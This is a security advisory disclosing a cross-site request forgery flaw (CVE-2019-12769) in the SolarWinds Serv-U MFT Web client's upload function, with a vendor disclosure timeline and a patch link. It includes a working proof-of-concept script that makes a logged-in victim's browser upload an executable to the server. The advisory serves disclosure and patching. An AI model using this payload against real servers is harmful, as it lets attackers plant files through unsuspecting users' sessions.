CVE-2019–12769 — SolarWinds Serv-U Managed File Transfer (MFT) Web client < 15.1.6 Vulnerable to CSRF

SolarWinds Serv-U Managed File Transfer (MFT) Web client before 15.1.6 Hotfix 2 is vulnerable to Cross-Site Request Forgery in the file upload functionality via ?Command=Upload with the Dir and File parameters.
Note: No previous, or Linux, versions were tested.

An attacker would be able to upload files on behalf of a logged in user, if the attacker can coerce that user into visiting a website they control. Below an example of a malicious payload:

<script>
 function submitRequest()
 {
 var xhr = new XMLHttpRequest();
 xhr.open(“POST”, “https:\/\/serv-u.endpoint\/?Command=Upload&Dir=%2F%20&TransferID=1&File=C%3A%5Cfakepath%5Cmalicious.exe”, true);
 xhr.setRequestHeader(“Accept”, “text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8”);
 xhr.setRequestHeader(“Accept-Language”, “en-GB,en;q=0.5”);
 xhr.setRequestHeader(“Content-Type”, “multipart\/form-data; boundary= — — — — — — — — — — — — — -582127133260883362630819524”);
 xhr.withCredentials = true;
 var body = “ — — — — — — — — — — — — — — -582127133260883362630819524\r\n” + 
 “Content-Disposition: form-data; name=\”File\”; filename=\”malicious.exe\”\r\n” + 
 “Content-Type: application/x-ms-dos-executable\r\n” + 
 “\r\n” + 
 “MALICIOUS_CONTENT\x00\x00\x00\x00\x00\r\n” + 
 “ — — — — — — — — — — — — — — -582127133260883362630819524 — \r\n”;
 var aBody = new Uint8Array(body.length);
 for (var i = 0; i < aBody.length; i++)
 aBody[i] = body.charCodeAt(i); 
 xhr.send(new Blob([aBody]));
 }
 submitRequest();
</script>

Timeline:
* Vendor notified on 05/09/2018
* Vendor confirmed the issue on 31/10/2018
* Vendor released Serv-U v15.1.6 Hotfix 2 on 17/12/2018

Patch reference: https://support.solarwinds.com/SuccessCenter/s/article/Serv-U-15-1-6-HotFix-2